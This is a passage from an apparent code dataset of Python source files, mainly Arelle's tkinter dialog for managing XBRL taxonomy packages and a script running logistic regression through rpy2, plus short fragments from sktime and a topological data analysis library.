diagrams in `X`. In the\n second case, index i along axis 1 corresponds to the i-th\n homology dimension in :attr:`homology_dimensions_`.\n\n \"\"\"\n check_is_fitted(self, ['effective_metric_params_',\n 'homology_dimensions_'])\n X = check_diagram(X)\n\n Xt = _parallel_amplitude(X, self.metric,\n self.effective_metric_params_,\n self.homology_dimensions_,\n self.n_jobs)\n if self.order is None:\n return Xt\n Xt = np.linalg.norm(Xt, axis=1, ord=self.order).reshape(-1, 1)\n return Xt\n"} {"ext": "py", "sha": "1a30555e91c7bf3a42ad1f0b9aaf106f7a2e35f7", "content": "#!/usr/bin/env python3 -u\n# -*- coding: utf-8 -*-\n# copyright: sktime developers, BSD-3-Clause License (see LICENSE file)\n\"\"\"Implement transformers for summarizing a time series.\"\"\"\n\nimport warnings\n\nfrom sktime.transformations.series.summarize import WindowSummarizer\n\n__all__ = [\"WindowSummarizer\"]\n\nwarnings.warn(\n \"WindowSummarizer has been moved to transformations.series.summarize,\"\n + \" the old location in series.windows_summarize is deprecated since 0.11.0,\"\n + \" and will be removed in 0.12.0. 
Please use the import from \"\n + \"transformations.series.summarize import WindowSummarizer.\"\n)\n"} {"ext": "py", "sha": "1a30557d6404dbdd5f998bc2c989ed340e1a804c", "content": "'''\nCreated on Oct 6, 2013 (from DialogPluginManager.py)\n\n@author: Mark V Systems Limited\n(c) Copyright 2013 Mark V Systems Limited, All rights reserved.\n'''\nfrom tkinter import simpledialog, Toplevel, font, messagebox, VERTICAL, HORIZONTAL, N, S, E, W\nfrom tkinter.constants import DISABLED, ACTIVE\ntry:\n from tkinter.ttk import Treeview, Scrollbar, Frame, Label, Button\nexcept ImportError:\n from ttk import Treeview, Scrollbar, Frame, Label, Button\nfrom arelle import PackageManager, DialogURL\nfrom arelle.CntlrWinTooltip import ToolTip\nimport os, time\ntry:\n import regex as re\nexcept ImportError:\n import re\n\ndef dialogPackageManager(mainWin):\n # check for updates in background\n import threading\n thread = threading.Thread(target=lambda cntlr=mainWin: backgroundCheckForUpdates(cntlr))\n thread.daemon = True\n thread.start()\n\ndef backgroundCheckForUpdates(cntlr):\n cntlr.showStatus(_(\"Checking for updates to packages\")) # clear web loading status\n packageNamesWithNewerFileDates = PackageManager.packageNamesWithNewerFileDates()\n if packageNamesWithNewerFileDates:\n cntlr.showStatus(_(\"Updates are available for these packages: {0}\")\n .format(', '.join(packageNamesWithNewerFileDates)), clearAfter=5000)\n else:\n cntlr.showStatus(_(\"No updates found for packages.\"), clearAfter=5000)\n time.sleep(0.1) # Mac locks up without this, may be needed for empty ui queue? \n cntlr.uiThreadQueue.put((DialogPackageManager, [cntlr, packageNamesWithNewerFileDates]))\n\nclass DialogPackageManager(Toplevel):\n def __init__(self, mainWin, packageNamesWithNewerFileDates):\n super(DialogPackageManager, self).__init__(mainWin.parent)\n \n self.ENABLE = _(\"Enable\")\n self.DISABLE = _(\"Disable\")\n self.parent = mainWin.parent\n self.cntlr = mainWin\n \n # copy plugins for temporary display\n self.packagesConfig = PackageManager.packagesConfig\n self.packagesConfigChanged = False\n self.packageNamesWithNewerFileDates = packageNamesWithNewerFileDates\n \n parentGeometry = re.match(\"(\\d+)x(\\d+)[+]?([-]?\\d+)[+]?([-]?\\d+)\", self.parent.geometry())\n dialogX = int(parentGeometry.group(3))\n dialogY = int(parentGeometry.group(4))\n\n self.title(_(\"Taxonomy Packages Manager\"))\n frame = Frame(self)\n \n # left button frame\n buttonFrame = Frame(frame, width=40)\n buttonFrame.columnconfigure(0, weight=1)\n addLabel = Label(buttonFrame, text=_(\"Find taxonomy packages:\"), wraplength=64, justify=\"center\")\n addLocalButton = Button(buttonFrame, text=_(\"Locally\"), command=self.findLocally)\n ToolTip(addLocalButton, text=_(\"File chooser allows selecting taxonomy packages to add (or reload), from the local file system. \"\n \"Select either a PWD or prior taxonomy package zip file, or a taxonomy manifest (.taxonomyPackage.xml) within an unzipped taxonomy package. \"), wraplength=360)\n addWebButton = Button(buttonFrame, text=_(\"On Web\"), command=self.findOnWeb)\n ToolTip(addWebButton, text=_(\"Dialog to enter URL full path to load (or reload) package, from the web or local file system. \"\n \"URL may be either a PWD or prior taxonomy package zip file, or a taxonomy manifest (.taxonomyPackage.xml) within an unzipped taxonomy package. 
\"), wraplength=360)\n manifestNameButton = Button(buttonFrame, text=_(\"Manifest\"), command=self.manifestName)\n ToolTip(manifestNameButton, text=_(\"Provide pre-PWD non-standard archive manifest file name pattern (e.g., *taxonomyPackage.xml). \"\n \"Uses unix file name pattern matching. \"\n \"Multiple manifest files are supported in pre-PWD archives (such as oasis catalogs). \"\n \"(Replaces pre-PWD search for either .taxonomyPackage.xml or catalog.xml). \"), wraplength=480)\n self.manifestNamePattern = \"\"\n addLabel.grid(row=0, column=0, pady=4)\n addLocalButton.grid(row=1, column=0, pady=4)\n addWebButton.grid(row=2, column=0, pady=4)\n manifestNameButton.grid(row=3, column=0, pady=4)\n buttonFrame.grid(row=0, column=0, rowspan=3, sticky=(N, S, W), padx=3, pady=3)\n \n # right tree frame (packages already known to arelle)\n packagesFrame = Frame(frame, width=700)\n vScrollbar = Scrollbar(packagesFrame, orient=VERTICAL)\n hScrollbar = Scrollbar(packagesFrame, orient=HORIZONTAL)\n self.packagesView = Treeview(packagesFrame, xscrollcommand=hScrollbar.set, yscrollcommand=vScrollbar.set, height=7)\n self.packagesView.grid(row=0, column=0, sticky=(N, S, E, W))\n self.packagesView.bind('<>', self.packageSelect)\n hScrollbar[\"command\"] = self.packagesView.xview\n hScrollbar.grid(row=1, column=0, sticky=(E,W))\n vScrollbar[\"command\"] = self.packagesView.yview\n vScrollbar.grid(row=0, column=1, sticky=(N,S))\n packagesFrame.columnconfigure(0, weight=1)\n packagesFrame.rowconfigure(0, weight=1)\n packagesFrame.grid(row=0, column=1, columnspan=4, sticky=(N, S, E, W), padx=3, pady=3)\n self.packagesView.focus_set()\n\n self.packagesView.column(\"#0\", width=120, anchor=\"w\")\n self.packagesView.heading(\"#0\", text=_(\"Name\"))\n self.packagesView[\"columns\"] = (\"ver\", \"status\", \"date\", \"update\", \"descr\")\n self.packagesView.column(\"ver\", width=150, anchor=\"w\", stretch=False)\n self.packagesView.heading(\"ver\", text=_(\"Version\"))\n self.packagesView.column(\"status\", width=50, anchor=\"w\", stretch=False)\n self.packagesView.heading(\"status\", text=_(\"Status\"))\n self.packagesView.column(\"date\", width=170, anchor=\"w\", stretch=False)\n self.packagesView.heading(\"date\", text=_(\"File Date\"))\n self.packagesView.column(\"update\", width=50, anchor=\"w\", stretch=False)\n self.packagesView.heading(\"update\", text=_(\"Update\"))\n self.packagesView.column(\"descr\", width=200, anchor=\"w\", stretch=False)\n self.packagesView.heading(\"descr\", text=_(\"Description\"))\n\n remappingsFrame = Frame(frame)\n vScrollbar = Scrollbar(remappingsFrame, orient=VERTICAL)\n hScrollbar = Scrollbar(remappingsFrame, orient=HORIZONTAL)\n self.remappingsView = Treeview(remappingsFrame, xscrollcommand=hScrollbar.set, yscrollcommand=vScrollbar.set, height=5)\n self.remappingsView.grid(row=0, column=0, sticky=(N, S, E, W))\n hScrollbar[\"command\"] = self.remappingsView.xview\n hScrollbar.grid(row=1, column=0, sticky=(E,W))\n vScrollbar[\"command\"] = self.remappingsView.yview\n vScrollbar.grid(row=0, column=1, sticky=(N,S))\n remappingsFrame.columnconfigure(0, weight=1)\n remappingsFrame.rowconfigure(0, weight=1)\n remappingsFrame.grid(row=1, column=1, columnspan=4, sticky=(N, S, E, W), padx=3, pady=3)\n self.remappingsView.focus_set()\n \n self.remappingsView.column(\"#0\", width=200, anchor=\"w\")\n self.remappingsView.heading(\"#0\", text=_(\"Prefix\"))\n self.remappingsView[\"columns\"] = (\"remapping\")\n self.remappingsView.column(\"remapping\", width=500, anchor=\"w\", 
stretch=False)\n self.remappingsView.heading(\"remapping\", text=_(\"Remapping\"))\n \n # bottom frame package info details\n packageInfoFrame = Frame(frame, width=700)\n packageInfoFrame.columnconfigure(1, weight=1)\n \n self.packageNameLabel = Label(packageInfoFrame, wraplength=600, justify=\"left\", \n font=font.Font(family='Helvetica', size=12, weight='bold'))\n self.packageNameLabel.grid(row=0, column=0, columnspan=6, sticky=W)\n self.packageVersionHdr = Label(packageInfoFrame, text=_(\"version:\"), state=DISABLED)\n self.packageVersionHdr.grid(row=1, column=0, sticky=W)\n self.packageVersionLabel = Label(packageInfoFrame, wraplength=600, justify=\"left\")\n self.packageVersionLabel.grid(row=1, column=1, columnspan=5, sticky=W)\n self.packageDescrHdr = Label(packageInfoFrame, text=_(\"description:\"), state=DISABLED)\n self.packageDescrHdr.grid(row=2, column=0, sticky=W)\n self.packageDescrLabel = Label(packageInfoFrame, wraplength=600, justify=\"left\")\n self.packageDescrLabel.grid(row=2, column=1, columnspan=5, sticky=W)\n self.packagePrefixesHdr = Label(packageInfoFrame, text=_(\"prefixes:\"), state=DISABLED)\n self.packagePrefixesHdr.grid(row=3, column=0, sticky=W)\n self.packagePrefixesLabel = Label(packageInfoFrame, wraplength=600, justify=\"left\")\n self.packagePrefixesLabel.grid(row=3, column=1, columnspan=5, sticky=W)\n ToolTip(self.packagePrefixesLabel, text=_(\"List of prefixes that this package remaps.\"), wraplength=240)\n self.packageUrlHdr = Label(packageInfoFrame, text=_(\"URL:\"), state=DISABLED)\n self.packageUrlHdr.grid(row=4, column=0, sticky=W)\n self.packageUrlLabel = Label(packageInfoFrame, wraplength=600, justify=\"left\")\n self.packageUrlLabel.grid(row=4, column=1, columnspan=5, sticky=W)\n ToolTip(self.packageUrlLabel, text=_(\"URL of taxonomy package (local file path or web loaded file).\"), wraplength=240)\n self.packageDateHdr = Label(packageInfoFrame, text=_(\"date:\"), state=DISABLED)\n self.packageDateHdr.grid(row=5, column=0, sticky=W)\n self.packageDateLabel = Label(packageInfoFrame, wraplength=600, justify=\"left\")\n self.packageDateLabel.grid(row=5, column=1, columnspan=5, sticky=W)\n ToolTip(self.packageDateLabel, text=_(\"Date of currently loaded package file (with parenthetical node when an update is available).\"), wraplength=240)\n self.packageEnableButton = Button(packageInfoFrame, text=self.ENABLE, state=DISABLED, command=self.packageEnable)\n ToolTip(self.packageEnableButton, text=_(\"Enable/disable package.\"), wraplength=240)\n self.packageEnableButton.grid(row=6, column=1, sticky=E)\n self.packageMoveUpButton = Button(packageInfoFrame, text=_(\"Move Up\"), state=DISABLED, command=self.packageMoveUp)\n ToolTip(self.packageMoveUpButton, text=_(\"Move package up (above other remappings).\"), wraplength=240)\n self.packageMoveUpButton.grid(row=6, column=2, sticky=E)\n self.packageMoveDownButton = Button(packageInfoFrame, text=_(\"Move Down\"), state=DISABLED, command=self.packageMoveDown)\n ToolTip(self.packageMoveDownButton, text=_(\"Move package down (below other remappings).\"), wraplength=240)\n self.packageMoveDownButton.grid(row=6, column=3, sticky=E)\n self.packageReloadButton = Button(packageInfoFrame, text=_(\"Reload\"), state=DISABLED, command=self.packageReload)\n ToolTip(self.packageReloadButton, text=_(\"Reload/update package.\"), wraplength=240)\n self.packageReloadButton.grid(row=6, column=4, sticky=E)\n self.packageRemoveButton = Button(packageInfoFrame, text=_(\"Remove\"), state=DISABLED, command=self.packageRemove)\n 
ToolTip(self.packageRemoveButton, text=_(\"Remove package from packages table (does not erase the package file).\"), wraplength=240)\n self.packageRemoveButton.grid(row=6, column=5, sticky=E)\n packageInfoFrame.grid(row=2, column=0, columnspan=5, sticky=(N, S, E, W), padx=3, pady=3)\n packageInfoFrame.config(borderwidth=4, relief=\"groove\")\n \n okButton = Button(frame, text=_(\"Close\"), command=self.ok)\n ToolTip(okButton, text=_(\"Accept changes (if any) and close dialog.\"), wraplength=240)\n cancelButton = Button(frame, text=_(\"Cancel\"), command=self.close)\n ToolTip(cancelButton, text=_(\"Cancel changes (if any) and close dialog.\"), wraplength=240)\n okButton.grid(row=3, column=3, sticky=(S,E), pady=3)\n cancelButton.grid(row=3, column=4, sticky=(S,E), pady=3, padx=3)\n \n enableDisableFrame = Frame(frame)\n enableDisableFrame.grid(row=3, column=1, sticky=(S,W), pady=3)\n enableAllButton = Button(enableDisableFrame, text=_(\"Enable All\"), command=self.enableAll)\n ToolTip(enableAllButton, text=_(\"Enable all packages.\"), wraplength=240)\n disableAllButton = Button(enableDisableFrame, text=_(\"Disable All\"), command=self.disableAll)\n ToolTip(disableAllButton, text=_(\"Disable all packages.\"), wraplength=240)\n enableAllButton.grid(row=1, column=1)\n disableAllButton.grid(row=1, column=2)\n \n self.loadTreeViews()\n\n self.geometry(\"+{0}+{1}\".format(dialogX+50,dialogY+100))\n frame.grid(row=0, column=0, sticky=(N,S,E,W))\n frame.columnconfigure(0, weight=0)\n frame.columnconfigure(1, weight=1)\n frame.rowconfigure(0, weight=1)\n window = self.winfo_toplevel()\n window.columnconfigure(0, weight=1)\n window.rowconfigure(0, weight=1)\n \n self.bind(\"<Return>\", self.ok)\n self.bind(\"<Escape>\", self.close)\n \n self.protocol(\"WM_DELETE_WINDOW\", self.close)\n self.grab_set()\n self.wait_window(self)\n \n def loadTreeViews(self):\n self.selectedModule = None\n\n # clear previous treeview entries\n for previousNode in self.packagesView.get_children(\"\"): \n self.packagesView.delete(previousNode)\n\n for i, packageInfo in enumerate(self.packagesConfig.get(\"packages\", [])):\n name = packageInfo.get(\"name\", \"package{}\".format(i))\n node = self.packagesView.insert(\"\", \"end\", \"_{}\".format(i), text=name)\n self.packagesView.set(node, \"ver\", packageInfo.get(\"version\"))\n self.packagesView.set(node, \"status\", packageInfo.get(\"status\"))\n self.packagesView.set(node, \"date\", packageInfo.get(\"fileDate\"))\n if name in self.packageNamesWithNewerFileDates:\n self.packagesView.set(node, \"update\", _(\"available\"))\n self.packagesView.set(node, \"descr\", packageInfo.get(\"description\"))\n \n # clear previous treeview entries\n for previousNode in self.remappingsView.get_children(\"\"): \n self.remappingsView.delete(previousNode)\n\n for i, remappingItem in enumerate(sorted(self.packagesConfig.get(\"remappings\", {}).items())):\n prefix, remapping = remappingItem\n node = self.remappingsView.insert(\"\", \"end\", prefix, text=prefix)\n self.remappingsView.set(node, \"remapping\", remapping)\n \n self.packageSelect() # clear out prior selection\n\n def ok(self, event=None):\n if self.packagesConfigChanged:\n PackageManager.packagesConfig = self.packagesConfig\n PackageManager.packagesConfigChanged = True\n self.cntlr.onPackageEnablementChanged()\n self.close()\n \n def close(self, event=None):\n self.parent.focus_set()\n self.destroy()\n \n def packageSelect(self, *args):\n node = (self.packagesView.selection() or (None,))[0]\n try:\n nodeIndex = int(node[1:])\n except 
(ValueError, TypeError):\n nodeIndex = -1\n if 0 <= nodeIndex < len(self.packagesConfig[\"packages\"]):\n packageInfo = self.packagesConfig[\"packages\"][nodeIndex]\n self.selectedPackageIndex = nodeIndex\n name = packageInfo[\"name\"]\n self.packageNameLabel.config(text=name)\n self.packageVersionHdr.config(state=ACTIVE)\n self.packageVersionLabel.config(text=packageInfo[\"version\"])\n self.packageDescrHdr.config(state=ACTIVE)\n self.packageDescrLabel.config(text=packageInfo[\"description\"])\n self.packagePrefixesHdr.config(state=ACTIVE)\n self.packagePrefixesLabel.config(text=', '.join(packageInfo[\"remappings\"].keys()))\n self.packageUrlHdr.config(state=ACTIVE)\n self.packageUrlLabel.config(text=packageInfo[\"URL\"])\n self.packageDateHdr.config(state=ACTIVE)\n self.packageDateLabel.config(text=packageInfo[\"fileDate\"] + \" \" +\n (_(\"(an update is available)\") if name in self.packageNamesWithNewerFileDates else \"\"))\n self.packageEnableButton.config(state=ACTIVE,\n text={\"enabled\":self.DISABLE,\n \"disabled\":self.ENABLE}[packageInfo[\"status\"]])\n self.packageMoveUpButton.config(state=ACTIVE if 0 < nodeIndex else DISABLED)\n self.packageMoveDownButton.config(state=ACTIVE if nodeIndex < (len(self.packagesConfig[\"packages\"]) - 1) else DISABLED)\n self.packageReloadButton.config(state=ACTIVE)\n self.packageRemoveButton.config(state=ACTIVE)\n else:\n self.selectedPackageIndex = -1\n self.packageNameLabel.config(text=\"\")\n self.packageVersionHdr.config(state=DISABLED)\n self.packageVersionLabel.config(text=\"\")\n self.packageDescrHdr.config(state=DISABLED)\n self.packageDescrLabel.config(text=\"\")\n self.packagePrefixesHdr.config(state=DISABLED)\n self.packagePrefixesLabel.config(text=\"\")\n self.packageUrlHdr.config(state=DISABLED)\n self.packageUrlLabel.config(text=\"\")\n self.packageDateHdr.config(state=DISABLED)\n self.packageDateLabel.config(text=\"\")\n\n self.packageEnableButton.config(state=DISABLED, text=self.ENABLE)\n self.packageMoveUpButton.config(state=DISABLED)\n self.packageMoveDownButton.config(state=DISABLED)\n self.packageReloadButton.config(state=DISABLED)\n self.packageRemoveButton.config(state=DISABLED)\n \n def findLocally(self):\n initialdir = self.cntlr.pluginDir # default plugin directory\n if not self.cntlr.isMac: # can't navigate within app easily, always start in default directory\n initialdir = self.cntlr.config.setdefault(\"packageOpenDir\", initialdir)\n filename = self.cntlr.uiFileDialog(\"open\",\n parent=self,\n title=_(\"Choose taxonomy package file\"),\n initialdir=initialdir,\n filetypes=[(_(\"Taxonomy package files (*.zip)\"), \"*.zip\"),\n (_(\"PWD Manifest (taxonomyPackage.xml)\"), \"taxonomyPackage.xml\"),\n (_(\"pre-PWD Manifest (*.taxonomyPackage.xml)\"), \"*.taxonomyPackage.xml\"),\n (_(\"pre-PWD Oasis Catalog (*catalog.xml)\"), \"*catalog.xml\")],\n defaultextension=\".zip\")\n if filename:\n # check if a package is selected (any file in a directory containing an __init__.py\n self.cntlr.config[\"packageOpenDir\"] = os.path.dirname(filename)\n packageInfo = PackageManager.packageInfo(self.cntlr, filename, packageManifestName=self.manifestNamePattern)\n self.loadFoundPackageInfo(packageInfo, filename)\n \n\n def findOnWeb(self):\n url = DialogURL.askURL(self)\n if url: # url is the in-cache or local file\n packageInfo = PackageManager.packageInfo(self.cntlr, url, packageManifestName=self.manifestNamePattern)\n self.cntlr.showStatus(\"\") # clear web loading status\n self.loadFoundPackageInfo(packageInfo, url)\n \n def 
manifestName(self):\n self.manifestNamePattern = simpledialog.askstring(_(\"Archive manifest file name pattern\"),\n _(\"Provide non-standard archive manifest file name pattern (e.g., *taxonomyPackage.xml). \\n\"\n \"Uses unix file name pattern matching. \\n\"\n \"Multiple manifest files are supported in archive (such as oasis catalogs). \\n\"\n \"(If blank, search for either .taxonomyPackage.xml or catalog.xml). \"),\n initialvalue=self.manifestNamePattern,\n parent=self)\n \n def loadFoundPackageInfo(self, packageInfo, url):\n if packageInfo and packageInfo.get(\"name\"):\n self.addPackageInfo(packageInfo)\n self.loadTreeViews()\n else:\n messagebox.showwarning(_(\"Package is not itself a taxonomy package. \"),\n _(\"File does not itself contain a manifest file: \\n\\n{0}\\n\\n \"\n \"If opening an archive file, the manifest file search pattern currently is \\\"\\\", please press \\\"Manifest\\\" to change manifest file name pattern, e.g.,, \\\"*.taxonomyPackage.xml\\\", if needed. \")\n .format(url),\n parent=self)\n \n def removePackageInfo(self, name, version):\n # find package entry\n packagesList = self.packagesConfig[\"packages\"]\n j = -1\n for i, packageInfo in enumerate(packagesList):\n if packageInfo['name'] == name and packageInfo['version'] == version:\n j = i\n break\n if 0 <= j < len(packagesList):\n del self.packagesConfig[\"packages\"][i]\n self.packagesConfigChanged = True\n\n def addPackageInfo(self, packageInfo):\n name = packageInfo[\"name\"]\n version = packageInfo[\"version\"]\n self.removePackageInfo(name, version) # remove any prior entry for this package\n self.packageNamesWithNewerFileDates.discard(name) # no longer has an update available\n self.packagesConfig[\"packages\"].append(packageInfo)\n PackageManager.rebuildRemappings(self.cntlr)\n self.packagesConfigChanged = True\n\n def packageEnable(self):\n if 0 <= self.selectedPackageIndex < len(self.packagesConfig[\"packages\"]):\n packageInfo = self.packagesConfig[\"packages\"][self.selectedPackageIndex]\n if self.packageEnableButton['text'] == self.ENABLE:\n packageInfo[\"status\"] = \"enabled\"\n self.packageEnableButton['text'] = self.DISABLE\n elif self.packageEnableButton['text'] == self.DISABLE:\n packageInfo[\"status\"] = \"disabled\"\n self.packageEnableButton['text'] = self.ENABLE\n self.packagesConfigChanged = True\n PackageManager.rebuildRemappings(self.cntlr)\n self.loadTreeViews()\n \n def packageMoveUp(self):\n if 1 <= self.selectedPackageIndex < len(self.packagesConfig[\"packages\"]):\n packages = self.packagesConfig[\"packages\"]\n packageInfo = packages[self.selectedPackageIndex]\n del packages[self.selectedPackageIndex]\n packages.insert(self.selectedPackageIndex -1, packageInfo)\n self.packagesConfigChanged = True\n PackageManager.rebuildRemappings(self.cntlr)\n self.loadTreeViews()\n \n def packageMoveDown(self):\n if 0 <= self.selectedPackageIndex < len(self.packagesConfig[\"packages\"]) - 1:\n packages = self.packagesConfig[\"packages\"]\n packageInfo = packages[self.selectedPackageIndex]\n del packages[self.selectedPackageIndex]\n packages.insert(self.selectedPackageIndex + 1, packageInfo)\n self.packagesConfigChanged = True\n PackageManager.rebuildRemappings(self.cntlr)\n self.loadTreeViews()\n \n def packageReload(self):\n if 0 <= self.selectedPackageIndex < len(self.packagesConfig[\"packages\"]):\n packageInfo = self.packagesConfig[\"packages\"][self.selectedPackageIndex]\n url = packageInfo.get(\"URL\")\n if url:\n packageInfo = PackageManager.packageInfo(self.cntlr, url, 
reload=True, packageManifestName=packageInfo.get(\"manifestName\"))\n if packageInfo:\n self.addPackageInfo(packageInfo)\n PackageManager.rebuildRemappings(self.cntlr)\n self.loadTreeViews()\n self.cntlr.showStatus(_(\"{0} reloaded\").format(packageInfo.get(\"name\")), clearAfter=5000)\n else:\n messagebox.showwarning(_(\"Package error\"),\n _(\"File or package cannot be reloaded: \\n\\n{0}\")\n .format(url),\n parent=self)\n\n def packageRemove(self):\n if 0 <= self.selectedPackageIndex < len(self.packagesConfig[\"packages\"]):\n packageInfo = self.packagesConfig[\"packages\"][self.selectedPackageIndex]\n self.removePackageInfo(packageInfo[\"name\"], packageInfo[\"version\"])\n self.packagesConfigChanged = True\n PackageManager.rebuildRemappings(self.cntlr)\n self.loadTreeViews()\n \n def enableAll(self):\n self.enableDisableAll(True)\n \n def disableAll(self):\n self.enableDisableAll(False)\n \n def enableDisableAll(self, doEnable):\n for iPkg in range(len(self.packagesConfig[\"packages\"])):\n packageInfo = self.packagesConfig[\"packages\"][iPkg]\n if doEnable:\n packageInfo[\"status\"] = \"enabled\"\n self.packageEnableButton['text'] = self.DISABLE\n else:\n packageInfo[\"status\"] = \"disabled\"\n self.packageEnableButton['text'] = self.ENABLE\n self.packagesConfigChanged = True\n PackageManager.rebuildRemappings(self.cntlr)\n self.loadTreeViews()\n \n"} {"ext": "py", "sha": "1a30569524fe48b7b19699ba32d0e32ab5a2a404", "content": "#!/usr/bin/env python\n\n# from galaxy import eggs\nimport sys\n\nimport rpy2.rinterface as ri\nimport rpy2.rlike.container as rlc\n# from rpy import *\nimport rpy2.robjects as robjects\n\nr = robjects.r\n\n\ndef stop_err(msg):\n sys.stderr.write(msg)\n sys.exit()\n\n\ninfile = sys.argv[1]\ny_col = int(sys.argv[2]) - 1\nx_cols = sys.argv[3].split(\",\")\noutfile = sys.argv[4]\n\n\nprint(\"Predictor columns: %s; Response column: %d\" % (x_cols, y_col + 1))\nfout = open(outfile, \"w\")\nelems = []\nfor i, line in enumerate(file(infile)): # noqa F821\n line = line.rstrip(\"\\r\\n\")\n if len(line) > 0 and not line.startswith(\"#\"):\n elems = line.split(\"\\t\")\n break\n if i == 30:\n break # Hopefully we'll never get here...\n\nif len(elems) < 1:\n stop_err(\n \"The data in your input dataset is either missing or not formatted properly.\"\n )\n\ny_vals = []\nx_vals = []\nx_vector = []\nfor k, col in enumerate(x_cols):\n x_cols[k] = int(col) - 1\n x_vals.append([])\n\nNA = \"NA\"\nfor ind, line in enumerate(file(infile)): # noqa F821\n if line and not line.startswith(\"#\"):\n try:\n fields = line.split(\"\\t\")\n try:\n yval = float(fields[y_col])\n except Exception:\n yval = r(\"NA\")\n y_vals.append(yval)\n for k, col in enumerate(x_cols):\n try:\n xval = float(fields[col])\n except Exception:\n xval = r(\"NA\")\n x_vals[k].append(xval)\n x_vector.append(xval)\n except Exception as e:\n print(e)\n\n# x_vals1 = numpy.asarray(x_vals).transpose()\n\ncheck1 = 0\ncheck0 = 0\nfor i in y_vals:\n if i == 1:\n check1 = 1\n if i == 0:\n check0 = 1\nif check1 == 0 or check0 == 0:\n sys.exit(\"Warning: logistic regression must have at least two classes\")\n\nfor i in y_vals:\n if i not in [1, 0, r(\"NA\")]:\n print(str(i), file=fout)\n sys.exit(\n \"Warning: the current version of this tool can run only with two classes and need to be labeled as 0 and 1.\"\n )\n\n\n# dat= r.list(x=array(x_vals1), y=y_vals)\nnovif = 0\n# set_default_mode(NO_CONVERSION)\n# try:\n# linear_model = r.glm(r(\"y ~ x\"), data = r.na_exclude(dat),family=\"binomial\")\n# #r('library(car)')\n# 
#r.assign('dat',dat)\n# #r.assign('ncols',len(x_cols))\n# #r.vif(r('glm(dat$y ~ ., data = na.exclude(data.frame(as.matrix(dat$x,ncol=ncols))->datx),family=\"binomial\")')).as_py()\n#\n# except Exception as rex:\n# stop_err(\"Error performing logistic regression on the input data.\\nEither the response column or one of the predictor columns contain only non-numeric or invalid values.\")\n\nfv = robjects.FloatVector(x_vector)\nm = r[\"matrix\"](fv, ncol=len(x_cols), byrow=True)\n# ensure order for generating formula\nod = rlc.OrdDict([(\"y\", robjects.FloatVector(y_vals)), (\"x\", m)])\ndat = robjects.DataFrame(od)\n# convert dat.names: [\"y\",\"x.1\",\"x.2\"] to formula string: 'y ~ x.1 + x.2'\nformula = \" + \".join(dat.names).replace(\"+\", \"~\", 1)\nprint(formula)\ntry:\n linear_model = r.glm(formula, data=r[\"na.exclude\"](dat), family=\"binomial\")\nexcept Exception:\n stop_err(\n \"Error performing linear regression on the input data.\\nEither the response column or one of the predictor columns contain only non-numeric or invalid values.\"\n )\n\nif len(x_cols) > 1:\n try:\n r(\"library(car)\")\n r.assign(\"dat\", dat)\n r.assign(\"ncols\", len(x_cols))\n # vif=r.vif(r('glm(dat$y ~ ., data = na.exclude(data.frame(as.matrix(dat$x,ncol=ncols))->datx),family=\"binomial\")'))\n od2 = rlc.OrdDict([(\"datx\", m)])\n glm_data_frame = robjects.DataFrame(od2)\n glm_result = r.glm(\n \"dat$y ~ .\", data=r[\"na.exclude\"](glm_data_frame), family=\"binomial\"\n )\n print(\"Have glm\")\n vif = r.vif(glm_result)\n except Exception as rex:\n print(rex)\nelse:\n novif = 1\n\n# set_default_mode(BASIC_CONVERSION)\n\n# coeffs=linear_model.as_py()['coefficients']\ncoeffs = linear_model.rx2(\"coefficients\")\n# null_deviance=linear_model.as_py()['null.deviance']\nnull_deviance = linear_model.rx2(\"null.deviance\")[0]\n# residual_deviance=linear_model.as_py()['deviance']\nresidual_deviance = linear_model.rx2(\"deviance\")[0]\n# yintercept= coeffs['(Intercept)']\nyintercept = coeffs.rx2(\"(Intercept)\")[0]\n\nsummary = r.summary(linear_model)\n# co = summary.get('coefficients', 'NA')\nco = summary.rx2(\"coefficients\")\nprint(co)\n\"\"\"\nif len(co) != len(x_vals)+1:\n stop_err(\"Stopped performing logistic regression on the input data, since one of the predictor columns contains only non-numeric or invalid values.\")\n\"\"\"\n\ntry:\n yintercept = r.round(float(yintercept), digits=10)[0]\n # pvaly = r.round(float(co[0][3]), digits=10)\n pvaly = r.round(float(co.rx(1, 4)[0]), digits=10)[0]\nexcept Exception as e:\n print(str(e))\nprint(\"response column\\tc%d\" % (y_col + 1), file=fout)\ntempP = []\nfor i in x_cols:\n tempP.append(\"c\" + str(i + 1))\ntempP = \",\".join(tempP)\nprint(\"predictor column(s)\\t%s\" % (tempP), file=fout)\nprint(\"Y-intercept\\t%s\" % (yintercept), file=fout)\nprint(\"p-value (Y-intercept)\\t%s\" % (pvaly), file=fout)\n\nprint(coeffs)\nif len(x_vals) == 1: # Simple linear regression case with 1 predictor variable\n try:\n # slope = r.round(float(coeffs['x']), digits=10)\n raw_slope = coeffs.rx2(\"x\")[0]\n slope = r.round(float(raw_slope), digits=10)[0]\n except Exception:\n slope = \"NA\"\n try:\n # pval = r.round(float(co[1][3]), digits=10)\n pval = r.round(float(co.rx2(2, 4)[0]), digits=10)[0]\n except Exception:\n pval = \"NA\"\n print(\"Slope (c%d)\\t%s\" % (x_cols[0] + 1, slope), file=fout)\n print(\"p-value (c%d)\\t%s\" % (x_cols[0] + 1, pval), file=fout)\nelse: # Multiple regression case with >1 predictors\n ind = 1\n # while ind < len(coeffs.keys()):\n 
print(len(coeffs.names))\n while ind < len(coeffs.names):\n try:\n # slope = r.round(float(coeffs['x'+str(ind)]), digits=10)\n raw_slope = coeffs.rx2(\"x.\" + str(ind))[0]\n slope = r.round(float(raw_slope), digits=10)[0]\n except Exception:\n slope = \"NA\"\n print(\"Slope (c%d)\\t%s\" % (x_cols[ind - 1] + 1, slope), file=fout)\n\n try:\n # pval = r.round(float(co[ind][3]), digits=10)\n pval = r.round(float(co.rx2(ind + 1, 4)[0]), digits=10)[0]\n except Exception:\n pval = \"NA\"\n print(\"p-value (c%d)\\t%s\" % (x_cols[ind - 1] + 1, pval), file=fout)\n ind += 1\n\n# rsq = summary.get('r.squared','NA')\nrsq = summary.rx2(\"r.squared\")\nif rsq == ri.RNULLType():\n rsq = \"NA\"\nelse:\n rsq = rsq[0]\n\n\ntry:\n # rsq= r.round(float((null_deviance-residual_deviance)/null_deviance), digits=5)\n rsq = r.round(float((null_deviance - residual_deviance) / null_deviance), digits=5)[\n 0\n ]\n # null_deviance= r.round(float(null_deviance), digits=5)\n null_deviance = r.round(float(null_deviance), digits=5)[0]\n # residual_deviance= r.round(float(residual_deviance), digits=5)\n residual_deviance = r.round(float(residual_deviance), digits=5)[0]\n\nexcept Exception:\n pass\n\nprint(\"Null 